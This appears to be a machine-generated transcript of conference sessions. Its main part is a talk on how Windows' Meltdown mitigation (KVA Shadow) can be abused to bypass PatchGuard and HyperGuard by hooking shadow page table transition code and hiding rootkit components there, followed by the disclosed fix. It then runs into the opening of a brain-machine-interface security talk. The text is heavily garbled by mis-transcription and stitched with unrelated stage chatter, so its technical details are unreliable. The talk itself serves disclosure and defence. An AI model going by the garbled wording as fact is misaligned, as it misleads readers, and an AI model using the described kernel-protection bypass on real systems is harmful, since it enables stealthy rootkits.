else. You know 30% of the challenge is not that challenging. Now you're selling out the CDF. That's involved. But it's something more. That's actually not. That's not what I'm talking about. It's not about creating. It's about getting the challenge. That's you. You also have one challenge that has no change. which is something that usually doesn't happen. We had different jobs in our program. The first one was Sunday, so you had to understand how both of us were. And the other one was the same kind of back that was carried out, so we'll see you at the same back end. So again, this is entirely skills. but blockchain is not something that they usually fire you. So the challenge here was very

few people. Why do they exist? Which made up their existence? So that's why I was saying you have to be careful with traditional because if you just have the skin, it's just more of the same. You have to come up with skills and barriers. That also brings the issue of funding. You can do a lot of interesting stuff. I'll give you for example one of the best ideas I've ever done. Two years ago, they built a um What

I will say that I also thought that I know that I haven't done so much in the building so I did not that much in the instance. I probably should charge more. I usually don't use the internet. I usually want to make the living spirit. If you latch on to something else - Sponsoring, running your own agency. You want to have that in your bottom up. - Not that. - On the show. - Yeah. - I was part of the company. - I'm playing it. - I'm certainly not concerned about that. - Honestly, it is my fault. - I had a great day. - As soon as I finish it,

-

Thank you.

The line is for the underground. Do you want me to bring you water? I want you to bring me water.

Do you have your own presenter? The pointer to switch slides? No, we don't. Okay. We'll ask. If you stand next to the podium, there won't be any need. Body microphones? You're going to use this one. No, we can use this one. You guys just worry about it. It's a word for a digital carrier that they've been using. louder Then you don't even need the clicker right okay so there you go and you're gonna just make it perfect for the video okay yeah because it actually is better to stand at the podium for the video and you can walk around it doesn't work yeah yes it does work that's gonna say are you seeing it okay yeah

bluetooth so you don't have to point around yeah yeah yeah yeah yeah so okay you gotta stay there or you wear these and walk around yeah that's your choice We won't walk around I think. Okay, because otherwise I'm going to hit you with some water bottles when I come in here, a spray bottle, if you're off this mic and I come in here. Okay. I will hurt those cats. Okay, thanks. Have a good session, guys. Okay, thank you.

I hope there is a polo shirt here. I think there is. Okay.

Okay, hi everyone. We're happy to be here. So today we're going to discuss a research that we did shortly after the Meldon vulnerability was published. Basically what we did is to examine the patches that were made and we noticed that while it does mitigate meltdown it also opens the doors for some other security protections bypasses and we'll go through it today. So with me is Omri Misgarv, he's the security research team leader at Insilo and also past speaker in multiple B-Sides conferences. and I'm Udi, CTO and Co-Founder of Insilo and also spoken besides several times in Black Hat before. Okay, so just to outline the presentation, we'll start with a short introduction on speculative execution. We won't dive too much into the details. Then we'll

talk about the kernel virtual address space shadow and its internals, what it is exactly. how it enabled us to bypass some security mitigations, protections, we talked about the mitigations that were done and also other stuff you can do with that. Okay, so as a quick intro, most processors have a rather rich instruction set. and each instruction is composed out of micro-instructions or micro-operations. Those micro-operations are what actually the processor executes, and you can also see it on Intel manuals when you look into how each instruction is implemented, the breakdown of each of the micro-operations that are executed when an instruction is executed. So about speculative execution. So the idea is that in order to improve performance, the processor can try to execute instructions ahead of time

by guessing which branch is going to be taken or which instructions are going to be executed. So for example, if we have conditional branch instruction, The CPU will try to guess which instructions will be executed and then execute micro instructions or micro operations ahead of time. Now, obviously the processor can be wrong and choose the right branch to execute. And those cases, the actions that were done as part of the execution will be discarded. And we will call this transient instructions for this presentation. Now, while the state of the processor or the registers will not change if something like that happened, it will still have an effect, or at least this is the cause of meltdown on the general state of the

machine by actually putting pages in the cache. So Meltdown was processor level vulnerability, still is, and the verification was that it allowed user mode code, even totally unprivileged user mode code, to read in a rather effective way the entire memory, including kernel memory, although it's not supposed to be authorized to access it. At the time it affected Intel CPUs, based on publications, IBM PowerPCs and some ARM processors. And the idea was to leverage a side channel that was created due to CPU's memory cache. So if we take a look at the snippet below on the right hand side, let's say that the RCX register points to some kernel address that's not supposed to be accessible. When it's broke down to the micro operations the CPU

may still fetch that address and before it actually throws the exception it will try to execute the other operations. Now, if we see the operations below the last line, in case it will execute this micro-operation, it may put in the cache one of the pages that are prepared ahead of time by the attacker in order to know what data was in the kernel address. And by checking the time it takes to access this page, it is possible to know which page exactly was accessed and from that to know what was the data in kernel. Now I know that's a very high level explanation. To dive into the details, you can go to the address below. But it should pretty much--

and get us aligned on what happens exactly. So before diving to the mitigation, I'll just make a really short overview of virtual memory layout. So on 64-bit we have a page table that looks something like this. The base of the physical address related to the page table is found on CR3 and The first level is PML4, we'll discuss it more specifically in the rest of the presentation. And after you break down the virtual address and go through each part of the page tables, you eventually get to what is known as PTE. The PTE contains not only the physical address, but it also contains other bits that define the protection on the page, such as whether it's executable or not, whether it's user mode or kernel

space, writable or not, and so on. One other thing to note is that there is a field called page frame number, which is used to get to the actual physical address. We'll use it for the presentation as PFN to refer to physical addresses. Okay. So the solution in high level was quite simple. If the classic model of the operating system was to map the entire memory space in a single page table, both when user mode code is running and kernel mode code is running, like it is on the left hand side. Now after meltdown, the idea is to remove most of the kernel space code and only map the user portion of the memory. And so even if something like meltdown occurs, the

pages are not mapped, they are not there, and so there won't be any leak. More specifically, to implement that, There are now two page tables. One still have access to the entire address space and it is used when kernel mode code is executing. So you can see all the driver on the left hand side. And on the right hand side there is what's called the shadow page table which contains all the user mode code and code that is used for transitions between kernel and user mode. And now Omri will dive into the details and fix how it is implemented. Okay. So we have two tables, page tables. Now it means that Every time we transition from user space into kernel space, we have a new context switch

only for the memory of the same process. Both tables, as we mentioned, the kernel page table, which is the full address space page table, and the user shadow page table, those are terms that we're going to use later on in the presentation. Also, there are variations of this mitigation on Linux and Mac, but we won't dive into their internals, though they are quite similar. So the basic design, now that we have only a portion of the kernel, mapped into two tables means that we have to put the old code for the transitions in one single place. So it will be easier to map it in the two different page tables. Now all the code from the transitions, all the routine that handles

entering and exiting the kernel are found in a P section that is named KVAS code, as you can see in the slide. Every transition routine now has two versions, the shadow one, which is present in that section, and the regular one, which is present in the text section, the regular code section, in case you have a newer CPU that is not vulnerable to this attack. Now every transition routine has the second version that is accessing the shadow page table as a suffix of the shadow added to it, as you can see. And basically all what this function does, it checks whether or not currently the shadow page table is being used. And if so, on the transition to the kernel, switches it back to

the kernel page table. So operation could continue as regularly as it was before. And also the exit functions are also present, the exit functions from the kernel are also present in that same code section. So when we transition from ring-free, from the user space, into kernel mode, the CPU puts some of the data, it saves some of the data on the stack. for the transition to occur properly and the OS can later on use this kind of data. Usually it's named the machine frame which is part of the larger trap frame that the OS builds. Previously, without the mitigation, how the transition worked is that In user mode, the thread has its own stack. And when transitioning to the kernel, the same thread had a different stack in

the kernel space. Now, in order to simplify things, instead of that, first we got a transition stack. This stack is the one that is being used directly when we start executing on ring zero, and it will be used in the shadow functions that we mentioned in the previous slide, and it will change also the stack for the threads kernel stack. Now this kind of transition stack is not per thread but it's per CPU or per processor, per core if you want. Each virtual address points to the same physical address on both page tables of the same process. And because of that, this means that the code section for the transition, the KVAS code, is placed in

the same virtual address, so we can still use Meltdown to break KSLR. This is not something that was meant to be handled by the mitigation, and it's some sort of compromise by Microsoft. How the page tables work is actually by just copying the pt the pml4 entries from both page tables from the full one to the shadow one of the user space so you only have to keep a very small part synchronized and it's easier to do so it's very similar to how now to how the kernel is being shared between different processes up until now So this kind of memory context switch introduces pretty much a big performance issue. There were reports back at the time that

it cost a penalty of up to 30%, if I remember correctly. And in order to minimize The impact, some optimizations were made. First one is by utilizing the hardware. PCID is a mechanism that is used by, that is available on Intel, newer Intel processors. And it basically means that the software, or in this case the operating system, can provide a logical tag for the memory address space. So when cache entries are being built by the processor, it knows to append this kind of tag to them and then it knows to operate, when you operate in a specific context, to use just those relevant entries in the cache. Microsoft decided to use two IDs, one for the user

address space for all processes and the second one is for the kernel address space. And if you have an older CPU that doesn't support this mechanism, the next optimization is meant to try and help with that. Basically in the PTE there is a flag that marks the pages global, meaning that it won't be necessarily flushed in every change of the CR3 register. So up until now the kernel was marked as global, but it was switched to be set on the user address space PTEs. So now every time we transition into the kernel and switch the page table, the user space won't be flushed out of the cache and we'll save some performance on that. And the last

large optimization that was made is that elevated processes or administrative processes don't have this kind of shadow applied to them. So even if your machine is vulnerable, those kind of processes don't have these mechanisms applied to them. This is because they can gain access to the kernel in other ways. Because they are privileged, they can just loan their own driver to read and write the kernel address space. So there isn't really any benefit from shadowing those kind of processes as well. So, when the process starts, when the system starts, the initialization process is quite short regarding the mitigation. When we start, we start with the regular interrupt handlers, and then we get into the function that

checks if the actual mitigation should be applied. Its name is KI-enabled KVA shadowing. Once it does actually find that the mitigation needs to be applied, it changes the interrupt enders to the shadow version of them in the code section that we mentioned earlier. And then if it can, it opts in to PCID if the hardware supports it and sets the global flag KI/KVA shadow to indicate that the mitigation is active. Once this function is done, the MSRs for the system calls will be set properly according to the version of the function that we need, according to the global flag. Some kernel structures that are worth mentioning that add some changes and additions to them. We start with the E process. It

basically represents a process in the kernel. There are three fields that were added to it: the user directory table base, which is the base address of the shadow page table, address policy, which is a flag that means whether or not the current process is opted in into the mitigation, and the shadow mapping, which is the virtual address that corresponds to the user directory table base. And for the KPCR, some fields were added in order to enable the transitions. So those fields are being aligned and padded into a single page. So only that page from the entire structure is being mapped to the shadow page table. So no other data will leak. The kernel directory table base is the physical address of the

full page table that we use to swap in in the shadow entry point. The RSP base shadow is the kernel's user, kernel, is the thread's kernel mode stack pointer. User RSP shadow is the place we use to save the current user mode stack pointer. And the shadow flag, which indicates whether or not this mitigation actually applies to the current running thread. So the last thing we're gonna talk about and wrap up the internals part of the talk, is how a process is created. It kind of surprised us that we saw it, but when the mitigation is enabled on the machine, every process starts out with a shadow page table. Even before it executed, when it's being created, it's also being created with a proper shadow

page table, but because there was an optimization, so when privilege processes start executing, meaning when the first thread actually starts running, it will go ahead and remove the shadow page table. So now we get into the more interesting part. We talked a bit about the internals and how the mitigation works and stuff like that. Now let's talk about the security mechanisms that were possible to be affected from it. We start off with a patch guard, which is a pretty old mechanism. It's opportunistic in nature. It will try and protect the kernel and run it every once in a while and check for specific contents of certain elements, such as hashes of code pages or values in the SSDT or IDT, values of MSRs. And if you detect

some anomaly, it will crash the machine. HyperGuard, which is a bit newer mechanism, is deterministic in nature. It is hardware dependent though, it's not just software. It relies on the hardware and an hypervisor to be enabled and also provides services not for the kernel itself, but also for the hypervisor. Its method of working is a bit different. It verifies action. It doesn't check for content post-action, but because it's part of the hypervisor, it can opt in into certain events that cause VM exits. and stuff like that. So when write operations occur, you can validate them immediately. When an attempt to execute code happens, you can validate it immediately and so on. So how can we basically bypass them? If

we think about it, the limitations that they present is that we can't change any pages in the kernel because patch guard will catch us, and we can't really change MSRs, device of MSRs, because hyperguard will catch us much faster than patch guard. But if you think about it, now what we have is a new area in the kernel, in ring 0, that runs code, but it doesn't have the kernel. So, odds are, it also doesn't have patch guard. So, if we can figure out a way, basically, to grab hold of this area, we'll be able to bypass those protections. So, apparently we can do it pretty easily. All we have to do is make the pages on the shadow page table private to them and separate them

between the full page table and the shadow page table. And now we own those pages and we can do pretty much whatever we like with them and so on. So, what we can actually do? and how we can in practice achieve the bypass. So first we have to locate that code section in order to switch it. It's pretty easy, we can just pass the P section table and then allocate new pages for us to use. Now we need to build our own hook. It's a bit different this time. First, if you remember what the shadow entry point does, is that it checks for if it's currently in the context of the shadow page table and switch it. So now this check is quite redundant. We know

for sure that we are in the context of the shadow page table since those pages are owned by us and are private to that page table. So we can just remove it. We don't need it anymore. And now we need to actually be able to run our own code. If we try and run it in the shadow page table, it's possible, but we'll have some issues. We can't really use any functionality that the OS provides. We also won't have the rest of the data in the kernel space there because that's the whole point of the shadow page table. It will be filtered and a reduced view of the kernel itself. And another issue that will

be a bit more problematic later on, but that's pretty much sealed the deal for us, is the fact that we have to handle the relocations on ourselves. We don't use the OS loader here, so we build the code ourselves. We have to apply relocations also ourselves. So that's pretty much not a valid option for us. But what if we could actually go back into the kernel page table, but to our own code before we get to the kernel's code? So we can just facilitate this memory context switch, but we can use a ROP gadget beforehand and make sure that we'll go to our own code. So if we look at, let's say we take a look at the binary of the shared code section, that's

the original one. If you move to the disassembler view, we can look for that instruction opcode, which is the last byte on the snippet. If we look at how it looks by the view of this assembler, we can see the start of the original shadow entry point that we copied to those pages. And that will also be the the same content of the page after we switch back to the full page table. Now, instead, we can run it over with a basic ROP gadget that we built. We're going to push the address of our driver in the full page table and then facilitate the memory context switch by assigning the proper value to the CR3 register and using the

same RET instruction that will be present in both views. You can see now and the last thing we have to take care of is just switching the stack. So we'll finish with the transition stack and go back to the threads kernel stack and from there we are much more free to do what we want. So just to apply the hook is also very simple. All we need to do is pass the page tables and be able to change the PFNs. So we avoid any dangerous write operations that those mechanisms can monitor and that's how we can pretty much avoid them completely. Those page tables are accessed through physical addresses. So we can just do what forensics tools do in order to be able to get them. Either

use the physical memory device or do PT remapping on our own. We decided to go with PT remapping because we thought that there's less of a way to be detected that way. Once we get to our code and in the full page table and the one last thing we have to do before we are pretty much completely free is to flush the pages of the hooked pages virtual addresses from the cache. So we will avoid any recursion because now there is no more check of what the current memory context is and so the hook can just call itself over and over again if it's not fleshed out. And because we control the entire page, the same as we control the entry, we can also control the

exit. HVCI is another security mechanism. It's a bit outside of the scope of what we aimed to bypass, but it did present some challenges in order to implement this technique. We can no longer create our own pages on runtime because it actually prevents it. We either can't modify existing pages, so basically it means that we have to rely more and more on data pages, which is not a big deal. There is enough space to map data pages into the shadow page level near the shadow entry points. And our code needs to be position independent, and then we can compile it in advance and there won't be any issue. and our warp gadget will look something

similar to this. We need to get the code address and then use the data page that we set up when we installed the hook in order to fetch the address for the driver hook and we're pretty much free from here. So, if you follow the bit, up until now we managed to bypass the protections that we wanted, bypassed patchguard, we bypassed hyperguard, but now we had one small issue, it's not that small, it's quite big, we can only apply this kind of hooks and control only less privileged processes. And now, if we'll be honest, those are usually not that of great interest to defenders or attackers. Usually we're more interested in the privileged processes that don't have this shadow applied to

them, so the hook doesn't apply to them as well. So we tried to understand if it was actually possible to somehow force them into the mitigation and be able to control them as well. And we did manage to pull something off. If we start off with a newly created process, Basically, if you remember, all you have to do when the process is created, it does have a shadow page table. So if you can find a way to prevent it from being deleted, maybe we can just use it later on. So the code that manages the deletion of the shadow page table does one interesting check on the prologue. You can see on the lower right side that it checks the

shadow mapping field value if it's null. And if so, it just skips the entire function and won't clean up those resources. So if we monitor the creation of the process, which we do, and we can just save those fields and reset them, and once the process actually started running, we can opt it back in by restoring, by resynchronizing the PTEs of the user space and restoring the values. And all we have to do is resynchronize the state of the KPCR fields, which is very simple to do. We just call a memory context switch by attaching to a different process and returning to our own. And for cleanup, we don't really need to do anything. The system takes care of

it for us as well. Since it is the one that allocated all the pages and all the page tables, there is no issue here. So now we get into the more experimental area. Converting a running privilege process is a bit more of a trouble because the shadow page table was already deleted. We didn't prevent it from being deleted, so we have to figure something out. But apparently it's not that complicated as well. We will allocate a new page on our own. We then have to suspend the process so it won't run and do some memory operations. And we'll resync the--synchronize the shadow page table PML4 that we allocated. Again, we use the same synchronization for the user space. But since we allocated the page

table, we also need to synchronize the kernel space for the shadow page table, which is pretty easy. We can just use the system--the entries from the system process. We opt in the process again, setting the fields again to what we expect them to be when the mitigation is enabled, and then we continue. The difference here is that on termination, we need to opt the process back out and clean the page on our own. Otherwise, the system will crash because it will try and free resources that it didn't allocate. Okay, so far we discussed our... The mitigations enabled us to bypass patch guard, hyper guard and such mitigations. Now the mitigation that we recommended at the time was rather

simple and it was also what was eventually done. Basically, the only check that needs to be added to PatchGuard is to validate that the physical pages in the shadow page table match the physical pages in the full kernel page tables for those regions that are used for transition. And then indirectly, PatchGuard will validate the shadow pages while it validates the full kernel pages. Because the first check makes sure that the physical address is the same, so it's the same memory. And then the validation that the code didn't change makes sure that it's actually the original code. However, there is a single complication that this needs to be done for every process that is currently running. Otherwise, it is still possible to hijack specific processes and

take over them. So this is exactly what it does. It goes through all the running processes and makes sure that the physical pages match for those transition areas. So this was fixed on Redstone 5, Insider build 17655 and from then it was no longer possible to make those kind of hijacks. However, these tests only checks that the specific code that is used from a transition is not tampered. It is still possible to put code in the shadow page tables, execute kernel code there, put data there, and most security products don't look at that space at all. And even forensics tools normally will not look at those pages. So it is possible to put parts of rootkits there and high data there and so

on. So one possibility is to just improve patch guard so it will validate that those pages are empty, the page only contains the transition code that it's supposed to contain. and also it makes sense to add plugins to tools like Volatility and Recall to scan those pages as well Basically any code or any data in this page table that is not part of the transition code is suspicious and should not be there And some final notes So, as we all know, Meldon Inspector had a lot of impact, it made a lot of changes around the world and the way we view in the hardware protections and stuff like that and the patchguard was bypassed with the tree found was not

the only issue there was Actually a very significant issue in Windows 7 that was called Total Meltdown which was even much more than Meltdown itself. By mistake the page table on the kernel of Windows 7 was accessible to user mode and well this pretty much means that you can do whatever you want on the system. So this was also paid shortly after it was discovered. The point is that when doing such big changes, you probably should review as much as possible and even stuff that is not directly related to the architectural change. Also, it's probably going to be smart to take into account the shadow page tables when doing forensics and stuff like that because

as of today, it is still possible to hide stuff over there. Okay, we're pretty much done. Questions? Are virtual cores treated the same and are they as vulnerable as and mitigated in the same way as physical cores? Any other questions? Hi, thank you for the presentation. So The version that you said where the fix is in, is that out yet? That's still an insider preview, right? So basically the production version of Windows is still vulnerable to this? No, it's already applied to the production version. It was applied to insider build and later to the production version. There was another vulnerability announced today that used the swap.js It's related to Spectre, so another Intel vulnerability that was patched today, and it uses the

swap GS instruction to basically bypass all the previous mitigations for Spectre and Meltdown, including Cape ATI and all that. And the question would be, and apparently Microsoft did some silent patching back in July. And only today they released the advisory for it because this was a disclosure date. Have you had time to look into that? Or do you plan to look at the mitigations for that? Because there are some new mitigations there. We did not review it yet. And yes, we will. But we didn't have time to do it yet. Okay. Thank you.

Anyone else? All right. Thank you so much. Thank you. actually there was like you know like they're all the people and then they realized that this is a zero date so they have to put it back and now they they're not Yes. uh i think it has something to do with serializing the swap yeah

-

okay i'm probably louder great test test test good yes am i in a good place to hook up yeah just making sure you're not Oh no, I'll use the blue one. I came in and tested this already, so we're... No. Alright. It is. I'm going to tune you a little bit. I'm okay. Hang on, though. This is way over the top, so we should need to... That's nicer. Think right about there, or take it down yet again? I think this. And, uh...

All set. Sweet. You've got time to... I'm going to stick this on you real quickly. Go ahead. It's opening up right there. Hi. How you doing? I'm good. All right. You know what? Is it okay if I button your button? Yes, it is. As I... Actually, I get a little choky. So would you instead just... Is that one okay? Because it's not the top, top one. Yeah. All right. It's gonna say if not I can undo it but that way it'll keep your microphone straight. Yep. Right here? One, two. Give me a check one two. One two, check one two. There you are. Can you guys hear me in the back? Great. Okay clip that

on I turned it off for now and just don't forget to turn it on when the time comes. Would you tell me how? We'll switch on top off. Yeah it's a very tiny one you can't read it. Okay you guys have a great presentation and you're gonna walk over there when you're doing the right. Yeah. You're gonna move to that direction so we can get a good view of it. So Is it okay to walk in front of the projector? Because they said earlier not to. And likewise, if you'd like to reach out afterwards. It is much appreciated. Not that they can do, okay. All right. So, 10 minutes, 5 minutes, 2 minutes, 1 minute. I'll make a stop

sign for you. I'm introducing you. Obviously, there are special things. I don't think so. I think we're all set up. I'm just about to watch. That'd be super useful. Cool. I'll introduce you guys. Sound good. Hey, Ben. So, disclaimer at the beginning? Yeah. In what sense? Just that we need to see. I think we should at least say, yeah. By all means, yeah. If I do it, it's going to come up in the chat. Because it has three times already. Oh, you know what? So, I don't know if we want to do this, but the other talk I watched in here, they both kind of stood, but, well, they had a remote. We have a

remote for you guys. Oh. So, just kind of shift, like, over. But that has a laser. It's probably not on. Oh, fantastic. Thank you. Hello, everyone. Welcome. A few announcements before we get started. First off, I'd like to thank our sponsors, particularly our Inner Circle sponsors, Critical Stack and ValorMail, as well as some of our stellar sponsors, Amazon, BlackBerry, and Silance. We have a huge amount of sponsors this year, and we really could not do this conference without them. They're part of what makes this possible. So please go out there, see some sponsors, thank them. Please silence your cell phones. At the end, if there are questions, I will be walking around with a microphone. Make sure to speak your question into that microphone so the people

at home can hear you. And that's all the announcements I have. So without further ado, here are Ben Sawyer and Matt Canham. - Hi, thank you very much. Before we start, I just wanna say that whatever we say today is not the opinion or position of the US Army. So don't hold them responsible. Hi, I am Dr. Ben-Luehrer, this is Dr. Mankanam. We're with the Laboratory for Autonomy Brain Exchange at the University of Central Florida. And today we'd like to have you look at a problem that we've been looking at for some time. And we're here actually to enlist the opinion and the help of this community in continuing and identifying the direction of our

research. Today we'll be talking about InfoSec as it relates to brain-machine interface and the very near future and in fact present. So LabX or the Laboratory for Autonomy Brain Exchange is a group that really looks to engineer systems that optimize data flow between humans and machines. Basically get away from the slowest possible thing which is poking a screen with this chunk of meat. and get anything faster or better. We do that through neuroengineering. So neuroengineering basically means hooking up computers to the brain or to pieces that touch the brain and using that to move things faster than fingers can. Neuroergonomics, which means watching people as they use tools and understanding their brain state as a way of reengineering and redesigning, for example, interface. neuromodulation which is

the act of projecting into the brain in order to change your state in much the same way you do with caffeine does anyone here use caffeine then you're very very comfortable with neuromodulation it's just that a Red Bull is much slower than electric current and it would be nice to be able to have that jolt in the moment and other things like that Joel I'd like to just point out today that if you're interested in talking to us, our email, which will show up at the end again, is labx@ucf.edu. So, with the doubt of further ado, Matt, tell them a little bit about what we're doing. All right. So, I would like to point out

that we actually submitted this paper several months before Elon Musk made his Neuralink announcement. However, the timing of that was very good for us. And so, Elon, if you happen to be watching this, please send us a message. We'd love to chat with you. But the reason I want to bring this up is that I think that it shows how quickly we are moving towards consumer devices. In that announcement, Mr. Musk mentioned that they want to begin human trials within one year, so 2020 is the target date to begin human trials, and they want a consumer device within 10 years. So we'll see if that happens, but we have some very large companies such as Neuralink, Facebook, and others that are actively working to try

to bring this onto the market. So, just a quick overview on how the nervous system works. At the very base level we have neurons, which are cells that communicate with one another. And the way that they communicate is that they get these upstream signals. Sorry, let me use the laser. They get upstream signals from dendrites, which are connected to other neurons, that are sending these signals to the neuron, and after a certain threshold is met or exceeded, then the cell body, which is the soma or the nucleus of that neuron, will then decide to fire. And when it fires, it sends an electrical impulse down this thing called the axon, which sends this electrical impulse down that axon to

the synapse and that releases neurotransmitters across what are called the synaptic gap. Downstream from the synaptic gap is another dendrite, which is connected to another neuron, and so on and so forth. And so that's how these messages get passed. The importance of this is something called the action potential, which is what happens when this electrical current travels down that axon. And the reason that that's important is that's something that we can detect, and we're going to talk about that more in just a minute. Just a very quick high-level overview of some of the anatomy of the brain. You can see different components here, but the three that I really want to focus on are the cortex, which I'll talk more about in a second,

but the amygdala, which is this sort of almond-shaped, orange-reddish sort of thing here in the middle. The amygdala is responsible for emotional processing or making sort of these emotional or affective associations to stimulate. And the reason that this is important to what we're talking about today is that These associations can happen at a non-conscious or an unconscious level. This is actually what protects us a lot from danger. This may play a very significant role in things like PTSD. There was a case study of someone who witnessed the 9/11 attacks and didn't really have any real symptoms or anything. But then a full year went by since those attacks and suddenly just completely literally out of the blue was a clear blue day fall and the air was very cool

and crisp in a very similar way to the day that that 9/11 attack happened and all of a sudden this this gentleman just was over overwhelmed with a panic attack it didn't really understand why and one of the main reasons that may have been occurring was that the The amygdala had made this association between those weather conditions and danger, but he himself had no idea that his brain had made this association. This demonstrates how the brain can make associations between things that we have absolutely no conscious idea or understanding that it's making. In contrast to that, we have the hippocampus, which is this thing right behind the amygdala, and that's responsible for the consolidation of memory. And so this is what

transfers basically short-term memory into long-term memory. This happens a lot during sleep, And so you can actually suffer from something called sleep induced amnesia, where if you stay up for several days in a row, you actually lose very significant chunks of time. And one of the reasons for that is that your hippocampus is not consolidating those memories. Also in brain trauma, we see sometimes when people receive brain trauma, so they'll get a concussion or something like that, if there's damage to that hippocampus, there's a very low probability that that person will have any sort of memory for that event. Instead, they'll just have this chunk of time that's lost where they were doing something and then the next thing they knew, they woke up somewhere

like in a hospital.

Okay, so then coming back to the cortex, when we look at the cortex, this crinkly sort of outer sheath of the brain that we typically think of when we think about the brain, The cortex is divided roughly into four regions. In this case, this pink area on the left-hand side would be the front, and that is the frontal lobe. Right behind that, we've got the parietal lobe, which kind of sits up on top, and then the temporal lobe, which is kind of right by the ear, and then the occipital lobe. The frontal lobe is responsible for what we call executive functions. And these are things like attention, working memory, decision making, reasoning. And coincidentally, when someone's very

upset, it tends to drive the attentional focus towards whatever's upsetting us. But that also distracts us from things like being able to reason clearly. So if somebody is very emotionally upset, chances of them being able to reason through something very well is probably not so good. Likewise, fine motor control, I should specify, it's not just motor control, but it's fine motor control, is controlled by the premotor cortex, which is just kind of in the back end of this frontal lobe here. If you talk to any veterans, one of the first things that goes out the window in combat when things are really intense is this ability to do fine motor functions. Your gross motor skills will still be there, but your fine motor skills aren't so

good, and that's one of the reasons. In the parietal lobe, we have... somatosensory, which is your sense for your body. So when you experience touching sensations like on your hands or on your cheek or anywhere on your body, there is a corresponding representation of that part of your body in your somatosensory cortex, which is right here in the front of the parietal lobe. Temporal lobe is also known as auditory cortex. This is what processes auditory information. It's also primarily responsible for long-term memory. And then finally in the back we have the occipital lobe, which is also known as a visual cortex, and this is what processes visual information. These don't operate in isolation. So if

you see something, that information goes from your eyes over here back through the optical nerve to the occipital lobe in the visual cortex, but then very quickly it moves forward to these other lobes. So if you see a baseball coming at you, that information is initially processed in your visual cortex, But your temporal lobe starts processing that and trying to recognize what that object is and recognizes it as a baseball, while your parietal lobe is calculating the trajectory of it coming towards you and trying to understand where that baseball is spatially in relation to yourself. So, you know, looking at this, you can come back one. Oh, sure. Looking at this, have you ever tried to explain how a modern computer works to someone who's

naive? It's a strange moment, right? There's all of these layers and all these miracles happening. And you're like, no, listen, hardware and software. And to them, it's a screen and it's a tool. I'd like you to take just a second and think about your own brain. You don't do that very often. How many people here have held a brain in your hands? I don't care what type of brain. It's a fascinating thing, right? It's a lot smaller than the head. It's padded by a lot of things. Your own brain is likely, think a large grapefruit. So just think about that for a moment. It's sitting there between your ears right now. It's the reason that

you're looking at me and talking to me. That object, is in fact an amalgam of many different pieces. And a change to any one of those pieces can have huge effects on what you can do and who you are. We've all read stories about that. Some of us have people in our families who have those issues. People who have issues with memory. It's very interesting to look at a person, and very frightening, and see how, although the whole is still them, pieces can change. And in fact, if you'll go forward a slide, this is something we write about a lot. And science fiction has been pulling on this thread our whole lives. And in fact,

one of the strange things about what we're going to talk to you about today is even deep experts in this field have trouble separating the science fiction and the poetry and the lore that we've been exposed to our whole lives from the reality that is changing every single day. So what I'd like you to do for a second is just think about where you get your ideas. You know, the ghost in the shell is entirely about hacking brains. The Gibson Neuromancer books are deep in everybody's understanding in this community of what brains are and how they react with technology and what that means. Right now, Ian Banks books Look to Windward are really what Musk

talks about when he talks about neural link. The neural lace there is what his link to this world is. And so one of the fascinating things that comes out of this is it gets a little hard to separate sometimes the narrative because the scientists are using the science fiction to inform the reality. So think about that as we talk about what's actually possible right now. Because what we're going to do now is get away from how this lump of jelly between your ears... If you've ever dissected a brain, it's like dissecting a cup of yogurt. It just reveals nothing. But how we can get into it and start to understand what's coming out of it, and then how we can manipulate that. So talk a little bit about

sort of the constituent pieces here. And so if we're reading from the brain, there's really two types of signal that we can detect. One is blood flow. And so the neurons I talked about earlier, they're just like muscle cells, really. When they're working, they're consuming oxygen, right? So they need that replenishment of oxygenated hemoglobin. And so what we can do is we can actually detect when that starts to differentiate and where in the brain that differentiation is happening. And so that creates something called a bold signal that we can then detect. And you can see examples of that on the left. Likewise, when those neurons are firing, they're producing these electrical currents, and that's also detectable by an EEG like what I'm

wearing right now. So consider how you would determine what a computer is doing by watching its thermal signatures or by watching how much energy it uses in any given place. You might not be able to tell much, but you might be able to tell that when it's doing visually complex geometry, certain parts heat up and those are related to that. It's an association game when you start using this. In fact, what you're looking at here on the bottom is a great study. On the left are people being tickled and laughing. And in the center are people being tickled and trying to inhibit their laughter. Stop. And on the right are people voluntarily laughing at funny

images. And you can immediately look at the areas where the most blood is used and start to draw associations, right? You can say, oh, well, the difference between tickling and laughter and tickling and inhibition might be the things you use to inhibit things, right? So this is the sort of thing that scientists use to tease this apart. Electrical signals